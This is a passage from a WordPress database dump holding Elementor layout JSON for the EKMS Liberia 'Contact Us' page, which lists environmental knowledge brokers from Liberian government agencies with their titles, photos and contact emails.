href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23993,3515,'_elementor_edit_mode','builder'),(23994,3515,'_elementor_template_type','wp-page'),(23995,3515,'_elementor_version','3.0.16'),(23996,3515,'_wp_page_template','default'),(23997,3515,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br 